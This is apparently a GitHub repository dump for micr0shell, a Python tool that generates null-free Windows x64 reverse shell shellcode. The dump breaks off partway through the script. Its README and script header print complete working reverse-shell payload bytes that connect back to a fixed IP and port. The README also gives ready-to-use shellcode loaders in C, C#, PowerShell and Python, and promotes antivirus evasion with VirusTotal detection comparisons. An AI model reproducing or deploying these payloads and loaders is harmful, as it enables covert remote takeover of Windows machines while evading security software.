[ { "path": "README.md", "content": "# micr0 shell\nMicr0shell is a lightweight and efficient Python script designed for dynamically generating Windows X64 Position-Independent Code (PIC) Null-Free reverse shell shellcode. Depending on the options selected, the generated shellcode can be up to `27` bytes smaller than comparable shellcode from msfvenom, while also avoiding the inclusion of 0x00 bytes. Additionally, because MSF's shellcode is widely used and therefore more likely to be flagged by signature-based detection methods, the shellcode generated by micr0shell offers an added layer of evasion capability.\n\n```Shellcode Generated by MSF\n└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.45 LPORT=443 -f csharp -v shellcode -b \"\\x00\"\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nFound 3 compatible encoders\nAttempting to encode payload with 1 iterations of generic/none\ngeneric/none failed with Encoding failed due to a bad character (index=7, char=0x00)\nAttempting to encode payload with 1 iterations of x64/xor\nx64/xor succeeded with size 503 (iteration=0)\nx64/xor chosen with final size 503\nPayload size: 503 bytes\nFinal size of csharp file: 2586 bytes\nbyte[] shellcode = new byte[503] {\n0x48,0x31,0xc9,0x48,0x81,0xe9,0xc6,0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,\n0xff,0xff,0x48,0xbb,0x2b,0x1e,0x7f,0x17,0x61,0x58,0xad,0xc4,0x48,0x31,0x58,\n0x27,0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0xd7,0x56,0xfc,0xf3,0x91,0xb0,\n0x6d,0xc4,0x2b,0x1e,0x3e,0x46,0x20,0x08,0xff,0x95,0x7d,0x56,0x4e,0xc5,0x04,\n0x10,0x26,0x96,0x4b,0x56,0xf4,0x45,0x79,0x10,0x26,0x96,0x0b,0x56,0xf4,0x65,\n0x31,0x10,0xa2,0x73,0x61,0x54,0x32,0x26,0xa8,0x10,0x9c,0x04,0x87,0x22,0x1e,\n0x6b,0x63,0x74,0x8d,0x85,0xea,0xd7,0x72,0x56,0x60,0x99,0x4f,0x29,0x79,0x5f,\n0x2e,0x5f,0xea,0x0a,0x8d,0x4f,0x69,0x22,0x37,0x16,0xb1,0xd3,0x2d,0x4c,0x2b,\n0x1e,0x7f,0x5f,0xe4,0x98,0xd9,0xa3,0x63,0x1f,0xaf,0x47,0xea,0x10,0xb5,0x80,\n0xa0,0x5e,0x5f,0x5e,0x60,0x88,0x4e,0x92,0x63,0xe1,0xb6,0x56,0xea,0x6c,0x25,\n0x8c,0x2a,0xc8,0x32,0x26,0xa8,0x10,0x9c,0x04,0x87,0x5f,0xbe,0xde,0x6c,0x19,\n0xac,0x05,0x13,0xfe,0x0a,0xe6,0x2d,0x5b,0xe1,0xe0,0x23,0x5b,0x46,0xc6,0x14,\n0x80,0xf5,0x80,0xa0,0x5e,0x5b,0x5e,0x60,0x88,0xcb,0x85,0xa0,0x12,0x37,0x53,\n0xea,0x18,0xb1,0x8d,0x2a,0xce,0x3e,0x9c,0x65,0xd0,0xe5,0xc5,0xfb,0x5f,0x27,\n0x56,0x39,0x06,0xf4,0x9e,0x6a,0x46,0x3e,0x4e,0x20,0x02,0xe5,0x47,0xc7,0x3e,\n0x3e,0x45,0x9e,0xb8,0xf5,0x85,0x72,0x44,0x37,0x9c,0x73,0xb1,0xfa,0x3b,0xd4,\n0xe1,0x22,0x5e,0xdf,0x2f,0xde,0xf6,0x74,0x2d,0x4d,0x17,0x61,0x19,0xfb,0x8d,\n0xa2,0xf8,0x37,0x96,0x8d,0xf8,0xac,0xc4,0x2b,0x57,0xf6,0xf2,0x28,0xe4,0xaf,\n0xc4,0x2a,0xa5,0xbf,0xbf,0x60,0x75,0xec,0x90,0x62,0x97,0x9b,0x5b,0xe8,0xa9,\n0xec,0x7e,0x67,0x69,0x59,0x10,0x9e,0x8d,0xe1,0x4d,0xc1,0x76,0x7e,0x16,0x61,\n0x58,0xf4,0x85,0x91,0x37,0xff,0x7c,0x61,0xa7,0x78,0x94,0x7b,0x53,0x4e,0xde,\n0x2c,0x69,0x6d,0x8c,0xd4,0xde,0x37,0x9e,0xa3,0x10,0x52,0x04,0x63,0x97,0xbe,\n0x56,0xdb,0xb2,0xa2,0x1b,0xcb,0xe1,0xaa,0x5f,0xe8,0x9f,0xc7,0xd4,0x6a,0x46,\n0x33,0x9e,0x83,0x10,0x24,0x3d,0x6a,0xa4,0xe6,0xb2,0x15,0x39,0x52,0x11,0x63,\n0x9f,0xbb,0x57,0x63,0x58,0xad,0x8d,0x93,0x7d,0x12,0x73,0x61,0x58,0xad,0xc4,\n0x2b,0x5f,0x2f,0x56,0x31,0x10,0x24,0x26,0x7c,0x49,0x28,0x5a,0x50,0x98,0xc7,\n0xc9,0x72,0x5f,0x2f,0xf5,0x9d,0x3e,0x6a,0x80,0x0f,0x4a,0x7e,0x16,0x29,0xd5,\n0xe9,0xe0,0x33,0xd8,0x7f,0x7f,0x29,0xd1,0x4b,0x92,0x7b,0x5f,0x2f,0x56,0x31,\n0x19,0xfd,0x8d,0xd4,0xde,0x3e,0x47,0x28,0xa7,0x65,0x89,0xa2,0xdf,0x33,0x9e,\n0xa0,0x19,0x17,0xbd,0xe7,0x21,0xf9,0xe8,0xb4,0x10,0x9c,0x16,0x63,0xe1,0xb5,\n0x9c,0x6f,0x19,0x17,0xcc,0xac,0x03,0x1f,0xe8,0xb4,0xe3,0x5d,0x71,0x89,0x48,\n0x3e,0xad,0xc7,0xcd,0x10,0x59,0xd4,0xcb,0x37,0x94,0xa5,0x70,0x91,0xc2,0x57,\n0x14,0xff,0xec,0x81,0x2d,0xa8,0x7f,0x6c,0x0d,0x0d,0x78,0x0b,0x58,0xf4,0x85,\n0xa2,0xc4,0x80,0xc2,0x61,0x58,0xad,0xc4 };\n```\n## Background\nI acquired my skills in x86 shellcode development through the `Offensive Security Exploit Developer` (OSED) course, which I found particularly captivating. Prior to the course, shellcode development seemed like a mysterious field to me, but I quickly realized how much flexibility it offers for achieving specific objectives. Recognizing that x64 shellcoding is more relevant and widely used in today's landscape, I've applied what I've learned to develop this dynamic and convenient Windows x64 reverse shell shellcode generator script.\n\n## How to Use\n### Install Keystone Engine\nTo generate shellcode from x64 assembly instructions in a Python script, `keystone` engine dependency is needed. Use `pip` to install Keystone Engine:\n\n```python\npip install keystone-engine\n```\n\n### Script Usage\nUsers have the flexibility to specify various parameters: the `IP address`, `listening port`, `variable name`, `shellcode format` (options include C, CSharp, Python, and PowerShell), `shell type` (either PowerShell or CMD), whether to `save` the generated shellcode to a file, and whether to `execute` the generated shellcode (True/False).\n\n```bash\n└─# python3 micr0shell.py \n\n███╗░░░███╗██╗░█████╗░██████╗░░█████╗░  ░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░\n████╗░████║██║██╔══██╗██╔══██╗██╔══██╗  ██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░\n██╔████╔██║██║██║░░╚═╝██████╔╝██║░░██║  ╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░\n██║╚██╔╝██║██║██║░░██╗██╔══██╗██║░░██║  ░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░\n██║░╚═╝░██║██║╚█████╔╝██║░░██║╚█████╔╝  ██████╔╝██║░░██║███████╗███████╗███████╗\n╚═╝░░░░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝░╚════╝░  ╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝\n\nAuthor: Senzee\nGithub Repository: https://github.com/senzee1984/micr0_shell\nDescription: Dynamically generate PIC Null-Free Reverse Shell Shellcode\nAttention: In rare cases (.255 and .0 co-exist), generated shellcode could contain NULL bytes, E.G. when IP is 192.168.0.255\n\n\nusage: micr0shell.py [-h] --ip IP [--port PORT] [--language LAN] [--variable VAR] [--type SHELL_TYPE] [--execution CODE_EXEC] [--save SAVE]\n [--output OUTPUT]\nmicr0shell.py: error: the following arguments are required: --ip/-i\n\n```\n\nOnly the `IP address` must be specified to make the shellcode work well. The default port value is `443`, the default variable name is `buf`, the default language is `python`, and the default shell type is `cmd.exe`.\n\nUsers can choose to execute generated shellcode in this Python script, generated shellcode can also be saved in a binary file. By default, generated shellcode is `NOT EXECUTED` and `NOT SAVED` in a file.\n\n### Simple Shellcode Runner\nSimple shellcode loaders in different common languages are provided below to test the generated shellcode conveniently. \n\nHowever, if you're interested in evaluating evasion capabilities, be aware that the following shellcode loaders could themselves be detected. For more advanced evasion techniques, you may want to explore alternative shellcode loaders, which are beyond the scope of this README document.\n\n#### C\n```c\n#include \"windows.h\"\n#include \"stdlib.h\"\n\nunsigned char shellcode[] = {\n 0xfc, 0x48, 0x83, 0xe4, 0xf0......}; // SHELLCODE HERE\n\nint main()\n{\n int length = sizeof(shellcode);\n void* exec = VirtualAlloc(0, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n RtlMoveMemory(exec, shellcode, length);\n HANDLE th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);\n}\n```\n\n#### CSharp\n```csharp\nusing System;\nusing System.Runtime.InteropServices;\n\nnamespace runner\n{\n public class runner\n {\n [DllImport(\"kernel32.dll\", SetLastError = true, ExactSpelling = true)]\n static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\n\n [DllImport(\"kernel32.dll\")]\n static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\n\n [DllImport(\"kernel32.dll\")]\n static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);\n\n public static void Main(String[] args)\n {\n byte[] buffer= new byte[479] {0x48,0x31,0xd2,0x65,0x48,0x8b,0x42,0x60,0x48......}; // SHELLCODE HERE\n IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x3000, 0x40);\n Marshal.Copy(shellcode, 0, addr, shellcode.Length);\n IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);\n WaitForSingleObject(hThread, 0xFFFFFFFF);\n return;\n }\n }\n}\n```\n\n#### PowerShell\n```powershell\nfunction LookupFunc {\n Param ($moduleName, $functionName)\n $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |\n Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].\n Equals('System.dll')\n }).GetType('Microsoft.Win32.UnsafeNativeMethods')\n $tmp=@()\n $assem.GetMethods() | ForEach-Object {If($_.Name -eq \"GetProcAddress\") {$tmp+=$_}}\n return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,\n@($moduleName)), $functionName))\n}\n\n\nfunction getDelegateType {\n Param (\n [Parameter(Position = 0, Mandatory = $True)] [Type[]]\n $func, [Parameter(Position = 1)] [Type] $delType = [Void]\n )\n $type = [AppDomain]::CurrentDomain.\n DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),\n[System.Reflection.Emit.AssemblyBuilderAccess]::Run).\n DefineDynamicModule('InMemoryModule', $false).\n DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,\n AutoClass', [System.MulticastDelegate])\n\n $type.\n DefineConstructor('RTSpecialName, HideBySig, Public',\n[System.Reflection.CallingConventions]::Standard, $func).\n SetImplementationFlags('Runtime, Managed')\n\n $type.\n DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType,\n$func). SetImplementationFlags('Runtime, Managed')\n return $type.CreateType()\n}\n\n$lpMem =[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)\n\n[Byte[]] $buf = \n\n[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)\n$hThread =[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)\n[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int]))).Invoke($hThread, 0xFFFFFFFF)\n```\n\n#### Python\n```python\nimport ctypes, struct\n\n\nbuf = b\"\\x48\\x31\\....\" # SHELLCODE HERE\nbuf=bytearray(buf)\n\nctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64\nptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),\n ctypes.c_int(len(buf)),\n ctypes.c_int(0x3000),\n ctypes.c_int(0x40))\n\nbuf = (ctypes.c_char * len(buf)).from_buffer(buf)\nctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),\n buf,\n ctypes.c_int(len(buf)))\nprint(\"Shellcode located at address %s\" % hex(ptr))\n\nht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),\n ctypes.c_int(0),\n ctypes.c_uint64(ptr),\n ctypes.c_int(0),\n ctypes.c_int(0),\n ctypes.pointer(ctypes.c_int(0)))\n\nctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n```\n\n## Known Issues\n1. Based on the provided `IP address`, `port`, and `shell type`, micr0shell dynamically generates Null-Free shellcode. While I've accounted for most common scenarios that could introduce Null bytes, it's worth noting that if the supplied IP address contains both `.255` and `.0`—such as `192.168.0.255`—the generated shellcode will include a Null byte. Though such IP addresses are relatively rare in practice, eliminating Null bytes for all possible IP addresses would significantly increase complexity. As a result, I have no immediate plans to address this issue.\n\n2. Concerning the port value, theoretically, no port should produce a Null byte. However, due to the way Null-byte elimination is implemented, port `65280` is not usable.\n\n3. On `Windows 11`, `double-clicking` the shellcode loader program/script will cause the shell session to exit quickly. However, if you launch it through `CMD` or `PowerShell`, the shell session will remain active until you disconnect from the server. This issue is currently under investigation and appears to be related to the shellcode itself. I will find a way to fix this ASAP.\n\n\n## Test Case\nShellcode signature evasion capability test, sample files are uploaded to VirusTotal in Aug, 2023.\n\n### Shellcode Bin File\nUse msfvenom and micr0shell to generate raw binary files, and upload them, respectively. There are 2 samples generated from msfvenom, one includes 0x00, and the other is Null-Free. The comparison is as follows:\n\n![image](/screenshot/msf_include_00.jpg)\n\n![image](/screenshot/msf_null_free.jpg)\n\n![image](/screenshot/micr0shell.jpg)\n\nBy `8/13/2023`, raw shellcode bin file generated by micr0shell is not signatured.\n\n### Simple Shellcode Loader in C\nUse msfvenom and micr0shell to generate shellcode byte array, and include them in a simple shellcode runner written in C, respectively. There are 2 shellcodes generated from msfvenom, one includes 0x00, and the other is Null-Free. The comparison is as follows:\n\n![image](/screenshot/loader_msf_include_00.jpg)\n\n![image](/screenshot/loader_msf.jpg)\n\n![image](/screenshot/loader_micr0.jpg)\n\nBy `8/23/2023`, the shellcode loader includes the shellcode generated by micr0shell has much less detection. It is worth mentioning that the simple shellcode loader itself is signatured, even if the shellcode is harmless.\n\n\n\n## Screenshot\n\n![image](/screenshot/test.jpg)\n\n```cmd\n─# python3 micr0shell.py --ip 192.168.1.45 --port 443 --type cmd --language c --variable shellcode --execution false --save True --output buf.bin\n\n███╗░░░███╗██╗░█████╗░██████╗░░█████╗░  ░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░\n████╗░████║██║██╔══██╗██╔══██╗██╔══██╗  ██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░\n██╔████╔██║██║██║░░╚═╝██████╔╝██║░░██║  ╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░\n██║╚██╔╝██║██║██║░░██╗██╔══██╗██║░░██║  ░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░\n██║░╚═╝░██║██║╚█████╔╝██║░░██║╚█████╔╝  ██████╔╝██║░░██║███████╗███████╗███████╗\n╚═╝░░░░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝░╚════╝░  ╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝\n\nAuthor: Senzee\nGithub Repository: https://github.com/senzee1984/micr0_shell\nDescription: Dynamically generate PIC Null-Free Reverse Shell Shellcode\nAttention: In rare cases (.255 and .0 co-exist), generated shellcode could contain NULL bytes, E.G. when IP is 192.168.0.255\n\n\n[+]Shellcode Settings:\n******** IP Address: 192.168.1.45\n******** Listening Port: 443\n******** Language of desired shellcode runner: c\n******** Shellcode array variable name: shellcode\n******** Shell: cmd\n******** Shellcode Execution: false\n******** Save Shellcode to file: true\n\n\n[+]Payload size: 476 bytes\n\n[+]Shellcode format for C\n\nunsigned char shellcode[]={\n0x48,0x31,0xd2,0x65,0x48,0x8b,0x42,0x60,0x48,0x8b,0x70,0x18,0x48,0x8b,0x76,0x30,0x4c,0x8b,0x0e,0x4d,\n0x8b,0x09,0x4d,0x8b,0x49,0x10,0xeb,0x63,0x41,0x8b,0x49,0x3c,0x4d,0x31,0xff,0x41,0xb7,0x88,0x4d,0x01,\n0xcf,0x49,0x01,0xcf,0x45,0x8b,0x3f,0x4d,0x01,0xcf,0x41,0x8b,0x4f,0x18,0x45,0x8b,0x77,0x20,0x4d,0x01,\n0xce,0xe3,0x3f,0xff,0xc9,0x48,0x31,0xf6,0x41,0x8b,0x34,0x8e,0x4c,0x01,0xce,0x48,0x31,0xc0,0x48,0x31,\n0xd2,0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xca,0x0d,0x01,0xc2,0xeb,0xf4,0x44,0x39,0xc2,0x75,0xda,0x45,\n0x8b,0x57,0x24,0x4d,0x01,0xca,0x41,0x0f,0xb7,0x0c,0x4a,0x45,0x8b,0x5f,0x1c,0x4d,0x01,0xcb,0x41,0x8b,\n0x04,0x8b,0x4c,0x01,0xc8,0xc3,0xc3,0x4c,0x89,0xcd,0x41,0xb8,0x8e,0x4e,0x0e,0xec,0xe8,0x8f,0xff,0xff,\n0xff,0x49,0x89,0xc4,0x48,0x31,0xc0,0x66,0xb8,0x6c,0x6c,0x50,0x48,0xb8,0x57,0x53,0x32,0x5f,0x33,0x32,\n0x2e,0x64,0x50,0x48,0x89,0xe1,0x48,0x83,0xec,0x20,0x4c,0x89,0xe0,0xff,0xd0,0x48,0x83,0xc4,0x20,0x49,\n0x89,0xc6,0x49,0x89,0xc1,0x41,0xb8,0xcb,0xed,0xfc,0x3b,0x4c,0x89,0xcb,0xe8,0x55,0xff,0xff,0xff,0x48,\n0x31,0xc9,0x66,0xb9,0x98,0x01,0x48,0x29,0xcc,0x48,0x8d,0x14,0x24,0x66,0xb9,0x02,0x02,0x48,0x83,0xec,\n0x30,0xff,0xd0,0x48,0x83,0xc4,0x30,0x49,0x89,0xd9,0x41,0xb8,0xd9,0x09,0xf5,0xad,0xe8,0x2b,0xff,0xff,\n0xff,0x48,0x83,0xec,0x30,0x48,0x31,0xc9,0xb1,0x02,0x48,0x31,0xd2,0xb2,0x01,0x4d,0x31,0xc0,0x41,0xb0,\n0x06,0x4d,0x31,0xc9,0x4c,0x89,0x4c,0x24,0x20,0x4c,0x89,0x4c,0x24,0x28,0xff,0xd0,0x49,0x89,0xc4,0x48,\n0x83,0xc4,0x30,0x49,0x89,0xd9,0x41,0xb8,0x0c,0xba,0x2d,0xb3,0xe8,0xf3,0xfe,0xff,0xff,0x48,0x83,0xec,\n0x20,0x4c,0x89,0xe1,0x48,0x31,0xd2,0xb2,0x02,0x48,0x89,0x14,0x24,0x48,0x31,0xd2,0x66,0xba,0x01,0xbb,\n0x48,0x89,0x54,0x24,0x02,0xba,0xc0,0xa8,0x01,0x2d,0x48,0x89,0x54,0x24,0x04,0x48,0x8d,0x14,0x24,0x4d,\n0x31,0xc0,0x41,0xb0,0x16,0x4d,0x31,0xc9,0x48,0x83,0xec,0x38,0x4c,0x89,0x4c,0x24,0x20,0x4c,0x89,0x4c,\n0x24,0x28,0x4c,0x89,0x4c,0x24,0x30,0xff,0xd0,0x48,0x83,0xc4,0x38,0x49,0x89,0xe9,0x41,0xb8,0x72,0xfe,\n0xb3,0x16,0xe8,0x99,0xfe,0xff,0xff,0x48,0xba,0x9c,0x92,0x9b,0xd1,0x9a,0x87,0x9a,0xff,0x48,0xf7,0xd2,\n0x52,0x48,0x89,0xe2,0x41,0x54,0x41,0x54,0x41,0x54,0x48,0x31,0xc9,0x66,0x51,0x51,0x51,0xb1,0xff,0x66,\n0xff,0xc1,0x66,0x51,0x48,0x31,0xc9,0x66,0x51,0x66,0x51,0x51,0x51,0x51,0x51,0x51,0x51,0xb1,0x68,0x51,\n0x48,0x89,0xe7,0x48,0x89,0xe1,0x48,0x83,0xe9,0x20,0x51,0x57,0x48,0x31,0xc9,0x51,0x51,0x51,0x48,0xff,\n0xc1,0x51,0xfe,0xc9,0x51,0x51,0x51,0x51,0x49,0x89,0xc8,0x49,0x89,0xc9,0xff,0xd0};\n\n\nGenerated shellcode successfully saved in file buf.bin\n```\n" }, { "path": "micr0 shell.py", "content": "import ctypes, struct\nimport argparse\nfrom keystone import *\n\n# Exploit Author: Senzee\n# Title: Windows/x64 - Reverse TCP Shell(192.168.1.45:443) Shellcode (476 Bytes)\n# Date: 08/11/2023\n# Platform: Windows X64\n# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter\n# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763\n# Test IP: 192.168.1.45 \n# Test Port: 443\n# Payload size: 476 bytes\n# Do not contain 0x00 byte\n\n\n# Generated Shellcode (192.168.1.45:443):\n# Payload size: 476 bytes\n# buf = b\"\\x48\\x31\\xd2\\x65\\x48\\x8b\\x42\\x60\\x48\\x8b\\x70\\x18\\x48\\x8b\\x76\\x20\\x4c\\x8b\\x0e\\x4d\"\n# buf += b\"\\x8b\\x09\\x4d\\x8b\\x49\\x20\\xeb\\x63\\x41\\x8b\\x49\\x3c\\x4d\\x31\\xff\\x41\\xb7\\x88\\x4d\\x01\"\n# buf += b\"\\xcf\\x49\\x01\\xcf\\x45\\x8b\\x3f\\x4d\\x01\\xcf\\x41\\x8b\\x4f\\x18\\x45\\x8b\\x77\\x20\\x4d\\x01\"\n# buf += b\"\\xce\\xe3\\x3f\\xff\\xc9\\x48\\x31\\xf6\\x41\\x8b\\x34\\x8e\\x4c\\x01\\xce\\x48\\x31\\xc0\\x48\\x31\"\n# buf += b\"\\xd2\\xfc\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x44\\x39\\xc2\\x75\\xda\\x45\"\n# buf += b\"\\x8b\\x57\\x24\\x4d\\x01\\xca\\x41\\x0f\\xb7\\x0c\\x4a\\x45\\x8b\\x5f\\x1c\\x4d\\x01\\xcb\\x41\\x8b\"\n# buf += b\"\\x04\\x8b\\x4c\\x01\\xc8\\xc3\\xc3\\x4c\\x89\\xcd\\x41\\xb8\\x8e\\x4e\\x0e\\xec\\xe8\\x8f\\xff\\xff\"\n# buf += b\"\\xff\\x49\\x89\\xc4\\x48\\x31\\xc0\\x66\\xb8\\x6c\\x6c\\x50\\x48\\xb8\\x57\\x53\\x32\\x5f\\x33\\x32\"\n# buf += b\"\\x2e\\x64\\x50\\x48\\x89\\xe1\\x48\\x83\\xec\\x20\\x4c\\x89\\xe0\\xff\\xd0\\x48\\x83\\xc4\\x20\\x49\"\n# buf += b\"\\x89\\xc6\\x49\\x89\\xc1\\x41\\xb8\\xcb\\xed\\xfc\\x3b\\x4c\\x89\\xcb\\xe8\\x55\\xff\\xff\\xff\\x48\"\n# buf += b\"\\x31\\xc9\\x66\\xb9\\x98\\x01\\x48\\x29\\xcc\\x48\\x8d\\x14\\x24\\x66\\xb9\\x02\\x02\\x48\\x83\\xec\"\n# buf += b\"\\x30\\xff\\xd0\\x48\\x83\\xc4\\x30\\x49\\x89\\xd9\\x41\\xb8\\xd9\\x09\\xf5\\xad\\xe8\\x2b\\xff\\xff\"\n# buf += b\"\\xff\\x48\\x83\\xec\\x30\\x48\\x31\\xc9\\xb1\\x02\\x48\\x31\\xd2\\xb2\\x01\\x4d\\x31\\xc0\\x41\\xb0\"\n# buf += b\"\\x06\\x4d\\x31\\xc9\\x4c\\x89\\x4c\\x24\\x20\\x4c\\x89\\x4c\\x24\\x28\\xff\\xd0\\x49\\x89\\xc4\\x48\"\n# buf += b\"\\x83\\xc4\\x30\\x49\\x89\\xd9\\x41\\xb8\\x0c\\xba\\x2d\\xb3\\xe8\\xf3\\xfe\\xff\\xff\\x48\\x83\\xec\"\n# buf += b\"\\x20\\x4c\\x89\\xe1\\x48\\x31\\xd2\\xb2\\x02\\x48\\x89\\x14\\x24\\x48\\x31\\xd2\\x66\\xba\\x01\\xbb\"\n# buf += b\"\\x48\\x89\\x54\\x24\\x02\\xba\\xc0\\xa8\\x01\\x2d\\x48\\x89\\x54\\x24\\x04\\x48\\x8d\\x14\\x24\\x4d\"\n# buf += b\"\\x31\\xc0\\x41\\xb0\\x16\\x4d\\x31\\xc9\\x48\\x83\\xec\\x38\\x4c\\x89\\x4c\\x24\\x20\\x4c\\x89\\x4c\"\n# buf += b\"\\x24\\x28\\x4c\\x89\\x4c\\x24\\x30\\xff\\xd0\\x48\\x83\\xc4\\x38\\x49\\x89\\xe9\\x41\\xb8\\x72\\xfe\"\n# buf += b\"\\xb3\\x16\\xe8\\x99\\xfe\\xff\\xff\\x48\\xba\\x9c\\x92\\x9b\\xd1\\x9a\\x87\\x9a\\xff\\x48\\xf7\\xd2\"\n# buf += b\"\\x52\\x48\\x89\\xe2\\x41\\x54\\x41\\x54\\x41\\x54\\x48\\x31\\xc9\\x66\\x51\\x51\\x51\\xb1\\xff\\x66\"\n# buf += b\"\\xff\\xc1\\x66\\x51\\x48\\x31\\xc9\\x66\\x51\\x66\\x51\\x51\\x51\\x51\\x51\\x51\\x51\\xb1\\x68\\x51\"\n# buf += b\"\\x48\\x89\\xe7\\x48\\x89\\xe1\\x48\\x83\\xe9\\x20\\x51\\x57\\x48\\x31\\xc9\\x51\\x51\\x51\\x48\\xff\"\n# buf += b\"\\xc1\\x51\\xfe\\xc9\\x51\\x51\\x51\\x51\\x49\\x89\\xc8\\x49\\x89\\xc9\\xff\\xd0\"\n\n\ndef print_banner():\n\tbanner=\"\"\"\n███╗░░░███╗██╗░█████╗░██████╗░░█████╗░  ░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░\n████╗░████║██║██╔══██╗██╔══██╗██╔══██╗  ██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░\n██╔████╔██║██║██║░░╚═╝██████╔╝██║░░██║  ╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░\n██║╚██╔╝██║██║██║░░██╗██╔══██╗██║░░██║  ░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░\n██║░╚═╝░██║██║╚█████╔╝██║░░██║╚█████╔╝  ██████╔╝██║░░██║███████╗███████╗███████╗\n╚═╝░░░░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝░╚════╝░  ╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝\n\"\"\"\n\tprint(banner)\n\tprint(\"Author: Senzee\")\n\tprint(\"Github Repository: https://github.com/senzee1984/micr0_shell\")\n\tprint(\"Description: Dynamically generate PIC Null-Free Reverse Shell Shellcode\")\n\tprint(\"Attention: In rare cases (.255 and .0 co-exist), generated shellcode could contain NULL bytes, E.G. when IP is 192.168.0.255\\n\\n\")\n\n\ndef b_not(num, size):\n\treverse = 0\n\tfor _ in range(size):\n\t\treverse = (reverse << 1) | (0 if num & 1 else 1)\n\t\tnum >>= 1\n\tnotted = 0\n\tfor _ in range(size):\n\t\tnotted = (notted << 1) | (reverse & 1)\n\t\treverse >>= 1\n\treturn notted\n\ndef get_address_argument(ip, port):\n\taddress = 0\n\tfor octet in ip.split(\".\")[::-1]:\n\t\taddress = (address << 8) | int(octet)\n\tfor _ in range(2):\n\t\taddress = (address << 8) | (port & 0xFF)\n\t\tport >>= 8\n\treturn hex(b_not((address << 16) | 2, 64))\n\ndef get_shell_type_argument(shell_type):\n\treturn (\n\t\t\" mov rcx, 0xff9a879ad19b929c;\"\n\t\t\" not rcx;\"\n\t\t\" push rcx;\"\n\t\t\" push rcx;\"\n\t) if shell_type == \"cmd\" else (\n\t\t\" mov rcx, 0x6568737265776f70;\"\n\t\t\" push rcx;\"\n\t\t\" mov rcx, 0xffff9a879ad19393;\"\n\t\t\" not rcx;\"\n\t\t\" push rcx;\"\n\t)\n\ndef output_shellcode(lan,encoding,var,code_exec,save):\n\tsh = b\"\"\n\tfor e in encoding:\n \t\tsh += struct.pack(\"B\", e)\n\tshellcode = bytearray(sh)\n\tprint(\"[+]Payload size: \"+str(len(encoding))+\" bytes\\n\")\n\tcounter=0\n\n\tif lan==\"python\":\n\t\tprint(\"[+]Shellcode format for Python\\n\")\n\t\tsc = \"\"\n\t\tsc = var+\" = b\\\"\"\n\t\tfor dec in encoding:\n \t\t\tif counter % 20 == 0 and counter != 0:\n \t\t\tsc += \"\\\"\\n\"+var+\"+=\"+\"b\\\"\"\n \t\t\tsc += \"\\\\x{0:02x}\".format(int(dec))\n \t\t\tcounter += 1\n\n\t\tif count % 20 > 0:\n\t\t\tsc += \"\\\"\" \n\t\tprint(sc)\t\n\n\telif lan==\"c\":\n\t\tprint(\"[+]Shellcode format for C\\n\")\n\t\tsc = \"unsigned char \" + var + \"[]={\\n\"\t\n\t\tfor dec in encoding:\n \t\t\tif counter % 20 == 0 